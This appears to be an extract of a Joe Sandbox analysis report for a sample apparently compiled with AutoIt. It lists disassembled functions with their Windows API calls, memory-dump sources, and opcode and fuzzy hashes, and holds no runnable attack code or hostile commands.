                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                • String ID:
                                                • API String ID: 1597257046-0
                                                • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                • String ID:
                                                • API String ID: 237123855-0
                                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyObject$IconWindow
                                                • String ID:
                                                • API String ID: 3349847261-0
                                                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                • String ID:
                                                • API String ID: 2223660684-0
                                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                • EndPath.GDI32(?), ref: 00447336
                                                • StrokePath.GDI32(?), ref: 00447344
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                • String ID:
                                                • API String ID: 2783949968-0
                                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 00472B63
                                                • GetDC.USER32(00000000), ref: 00472B6C
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 00472BB2
                                                • GetDC.USER32(00000000), ref: 00472BBB
                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                • __freeptd.LIBCMT ref: 0041516B
                                                • ExitThread.KERNEL32 ref: 00415173
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                • String ID:
                                                • API String ID: 1454798553-0
                                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _strncmp
                                                • String ID: Q\E
                                                • API String ID: 909875538-2189900498
                                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                • String ID: AutoIt3GUI$Container
                                                • API String ID: 2652923123-3941886329
                                                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove_strncmp
                                                • String ID: U$\
                                                • API String ID: 2666721431-100911408
                                                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                • String ID: LPT
                                                • API String ID: 3035604524-1350329615
                                                • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \$h
                                                • API String ID: 4104443479-677774858
